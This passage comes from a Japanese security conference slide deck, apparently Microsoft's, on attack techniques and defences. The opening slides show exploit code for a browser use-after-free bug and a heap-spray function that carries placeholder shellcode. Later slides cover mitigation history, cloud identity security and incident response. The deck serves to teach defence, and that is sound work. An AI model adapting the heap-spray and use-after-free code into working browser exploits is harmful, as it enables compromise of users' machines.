(i = 0; i < Array1.length; i++) { Array1[i].data = buffer; // Set comment data to buffer, try to overwrite heap memory of deleted object }" 6. var a = Element1.srcElement; // Access the pointer to the deleted object, trigger crash } 7. </script> <body> 8. <span id="SpanID"><IMG src="/abcd.gif" onload="FRemove(event)" /> </span> 9. </body> </html> </body> </html> “COMENT” element var Element EventObject(value1) -- IMG -- var Array1 “AAA” x200 "SpanID“ element (.innerHTM) ① - ② “SpanID”のinnerHTMLが無 くなったので、”SpanID”自 体がFreeされる “SpanID”の子として生成さ れた、EventObjectもFreeさ れる “COMENT” element var Element EventObject(value1) -- IMG -- var Array1 “AAA” x200 "SpanID“ element (.innerHTM) ③ EventObjectはFree済みのため、Array1で上書 きをされているが、var Elementは、このアド レスを指している var Elementから仮想関数 , srcElementを呼び 出そうとするが、関数のアドレスが、“AAAA” で上書きをされている “COMENT” element var Element EventObject(value1) -- IMG -- var Array1 “AAA” x200 "SpanID“ element (.innerHTM) Array1[200] “AAAAAAAAAAAAAAA AAAAAAA” ④ - ⑥
  • 57. Shellcodeを実行するためには --------- ECX 0xAAAAAAAA --------- --------- --------- --------- EAX --------- EAX+34 アクセス違反 0xAAAAAAAA ECXに読み込まれた値 ? サンプルコードでは、0xAAAAを書きこんでいたため、 アクセスバイオレーションになる Pointer #2 ECX Pointer #1 any any any any EAX Pointer #2 Top of Shell Code EAX+34 Shell Code Top of Shell Code Pointer #1 上書きしたヒープ内のアドレス 上書きしたヒープ内のアドレス 上書きしたヒープ内のアドレス ECXに上書きした ヒープ内のアドレスを 読み込ませる ? アクセスバイオレーションを回避して、 ShellCodeを実行するためには…
  • 58. Heap SprayでShellcodeを実行する 0x0c0d0c0d ECX 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d EAX 0x0c0d0c0d 0x0c0d0c0d EAX+34 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d ・・・ 0x0c0d0c0d Shell Code 0x0c0d0c0d 0x0c0d0c0d ? ヒープスプレーによるポインタとコードの操作 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d ECX = EAX 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d 0x0c0d0c0d ・・・ 0x0c0d0c0d Shell Code EAX+34 0x0c0d0c2f ? メモリイメージ 0x0c0d0c0dをCall 1. function HeapSpray() { Array2 = new Array(); var Shellcode = unescape( '%ucccc%ucccc'); // 仮の攻撃用のシェルコード var SprayValue = unescape('%u0c0d'); // スプレーして埋める用のNOPコード do { SprayValue += SprayValue } while( SprayValue.length < 870400 ); for (j = 0; j < 100; j++) Array2[j] = SprayValue + Shellcode; } 2. function FOverwrite() { buffer = "¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥ u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0 c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0 d¥u0c0d¥u0c0d¥u0c0d¥u0c0d¥u0c0d"; for (i = 0; i < Array1.length; i++) { Array1[i].data = buffer; } var t = Element1.srcElement; // Access the pointer to the deleted object, trigger crash } 0x0c0d0c0d OR AL, 0D
  • 59. 攻撃手法と対策の推移 Attack Mitigation Smashing the stack (Aug, 1996) Visual Studio 2002 (Feb, 2002) –First release of /GS[7] Overwrite variables[2] (Feb, 2002) SEH Overwrite[1] (Sep, 2003) Visual Studio 2003 (Nov, 2003) –Arrays placed adjacent to GS cookie –/SAFESEH added[9] XP SP2 released (Aug, 2004) –Windows compiled with /GS and /SAFESEH –DEP Attack Mitigation Bypass NX[3] (Sep, 2005) Visual Studio 2005 (Nov, 2005) –Arguments copied to safe locals for /GS ASLR (Nov, 2006) –Included with Windows Vista –Attacks against ASLR already existed Weak GS entropy[5] (May, 2007) SEHOP(2008) GS V3(2010) [1] Litchfield, David. Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 20003 Server.http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf. [2] Ren, Chris et al. Microsoft Compiler Flaw Technical Note. http://www.cigital.com/news/index.php?pg=art&artid=70. [3] skape, Skywing. Bypassing Windows Hardware-enforced DEP. http://www.uninformed.org/?v=2&a=4&t=sumry. [4] skape. Preventing the Exploitation of SEH Overwrites. http://www.uninformed.org/?v=5&a=2&t=sumry. [5] skape. Reducing the Effective Entropy of GS Cookies. http://www.uninformed.org/?v=7&a=2&t=sumry. [7] Microsoft. /GS Compiler Switch. http://msdn2.microsoft.com/en-us/library/8dbf701c(VS.80).aspx. [9] Microsoft. /SAFESEH Compiler Switch. http://msdn2.microsoft.com/en-us/library/9a89h429(VS.80).aspx.
  • 60. 65
  • 61.
  • 62.
  • 65.
  • 66. クラウド環境によるセキュリティ領域の拡張 デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社内 ネットワークと同様の管理し、社 内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知
  • 67.
  • 68.
  • 69. セキュリティ境界は、ネットワークからIDに移行 デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社内 ネットワークと同様の管理し、社 内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知 ID ID ID ID ID ID ID ID ID
  • 70. セキュリティ境界は、ネットワークからIDに移行 デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社内 ネットワークと同様の管理し、社 内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知 ID ID ID ID ID ID ID ID ID IDM IDM ID
  • 71. 人・デバイス・データとともにログも分散する デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社 内ネットワークと同様の管理し、 社内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知 ID ID ID ID ID ID ID ID ID
  • 72. クラウドに収集し分析するという考え方 デバイス管理安全な接続 Office 365 Dynamics Azure 社外の関係者 外部サービス • 社内外での 安全な データ交換 • 一元的な デバイスの 管理 • 社内外の ID統合(SSO) • 多要素認証 Azure RMS Azure ADP Intune Express Route 社内ネットワーク 認証基盤 データ保護 (暗号化) 柔軟で強靭な IT 基盤 管理基盤 ネットワーク 保護 Windows Server 2012 R2 Private Cloud 安全なサーバ Direct Access 社内ネットワークの外のPCを社 内ネットワークと同様の管理し、 社内ネットワークへの接続を提供 社内 / Cloud間を 専用線・VP接続 ATP ATA • 高度なマルウエア対策 • 安全なWeb閲覧 • 認証への攻撃検知 ID ID ID ID ID ID ID ID ID IDM ID
  • 74. 運 用 基 盤 必要とされる対策とその要素 対策のフェーズ・要素 Protect 対策 (ESAE) Detect 検出 (MTDS) Response 対応 (PADS) Assessment 評価・検証 (MSRA) Management and Monitor 管理・運用とモニター (MOF/ATA) Exercise 演習・訓練 (Workshop) Recover 復旧 (ESAE) 不正アクセス 対策 統制の仕組み 具体的な設定 USCGB等 アプリ APT対策 特権保護 ProcessPeople Product (Technology) ID管理 情報保護 情報の分類と 分離 暗号 アクセス管理 ボリューム 保護 ファイルの 保護 データの 保護 人とプロセスの マネジメント 教育・啓発 ISMS 監査 運用手順 (Procedure) ポリシー スタンダード モニタと計測 演習・訓練 事業継続(BCP) ネット OS セキュリティ ツール デバイス (ハード) 人材・組織
  • 75. 事件発覚 想定される発表内容 • 漏えいした情報の種類、 • 影響を受ける顧客数と特徴 • 想定される二次被害 • 推奨する対策 • 事故の原因・要因 • 事業への影響の有無 • 再発防止策 ある日、「事件発覚」の中のひとつの項目が報告された。事件を公表するかどうかを、至急判断しなくてはならない。 公表するものとして、「想定される発表内容」をまとめる事は可能か、また、どの程度の時間が必要か。 担当者などの整理 • 責任者(CEO, CIO, CTO, CSO, CISO?) • 報道対応 • 事故調査、まとめ • 法的な検討 • 顧客対応 • その他 • 弊社のメールアカウントを使った、標的メールが 取引先に送信された • 弊社が所有するIPアドレスから攻撃を受けているとの クレームが入った • インターネット上の掲示板に弊社の顧客情報を含む ドキュメントが掲載されている • 顧客から、弊社にしか登録をしていない「クレジット カードが勝手に使われた」とのクレームが入った • 弊社にしか登録をしていない「メールアドレスに広告が 入った」とのクレームが、今日になって3件目入った • WEBページから顧客情報が閲覧可能な状態にある • ハッカーの侵入を受けて、すべてのメールがインターネット に公開された • 標的型攻撃で機密情報が漏れた可能性があることが、警察 とJPCERT/CCからの連絡で判明した
  • 76. アンケートにご協力ください。 ●アンケートに 上記の Session ID のブレイクアウトセッションに チェックを入れて下さい。 ●アンケートはお帰りの際に、受付でご提出ください。 マイクロソフトスペシャルグッズと引換えさせていただきます。
  • 77. ROOM L Ask the Speaker のご案内 ●本セッションの詳細は、EXPO 会場内 『Ask the Speaker』コーナー Room L カウンタにてご説明させて いただきます。是非、お立ち寄りください。 Ask the Speaker EXPO会場MAP
  • 78. © 2016 Microsoft Corporation. All rights reserved.